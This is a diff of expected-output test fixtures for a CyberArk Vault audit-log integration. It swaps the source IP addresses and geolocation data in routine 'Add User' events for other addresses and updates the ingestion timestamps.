"cyberarkpas": { @@ -130,7 +106,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMPGW_localhost.localdomain", "message": "Add User", @@ -144,8 +120,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586611Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830920400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -171,20 +147,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -204,7 +168,7 @@ "PSMP_ADB_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -212,7 +176,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:35Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMP_ADB_localhost.localdomain", "message": "Add User", @@ -226,8 +190,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586616900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830924200Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -253,20 +217,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -286,7 +238,7 @@ "PSMApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -294,7 +246,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:19Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMApp_VAGRANT", "message": "Add User", @@ -308,8 +260,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586621300Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:19\",\"IsoTimestamp\":\"2021-03-10T17:59:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830928700Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:19\",\"IsoTimestamp\":\"2021-03-10T17:59:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -335,20 +287,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -368,7 +308,7 @@ "PSMGw_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -376,7 +316,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:27Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMGw_VAGRANT", "message": "Add User", @@ -390,8 +330,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586625300Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:27\",\"IsoTimestamp\":\"2021-03-10T17:59:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830933200Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:27\",\"IsoTimestamp\":\"2021-03-10T17:59:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -417,19 +357,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -449,7 +378,7 @@ "PSMApp_ASR-WIN" ], "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -457,7 +386,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:06Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add User", "source_user": "PSMApp_ASR-WIN", "message": "Add User", @@ -471,8 +400,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586629Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:06\",\"IsoTimestamp\":\"2021-03-10T22:19:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830937800Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:06\",\"IsoTimestamp\":\"2021-03-10T22:19:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -498,19 +427,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -530,7 +448,7 @@ "PSMGw_ASR-WIN" ], "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -538,7 +456,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:15Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add User", "source_user": "PSMGw_ASR-WIN", "message": "Add User", @@ -552,8 +470,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586632600Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:15\",\"IsoTimestamp\":\"2021-03-10T22:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830943200Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:15\",\"IsoTimestamp\":\"2021-03-10T22:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -579,20 +497,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -612,7 +518,7 @@ "PSMPApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -620,8 +526,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:36Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPApp_VAGRANT", "message": "Add User", @@ -635,8 +541,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586636200Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830948700Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -662,20 +568,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -695,7 +589,7 @@ "PSMPGW_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -703,8 +597,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:36Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPGW_VAGRANT", "message": "Add User", @@ -718,8 +612,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586639700Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 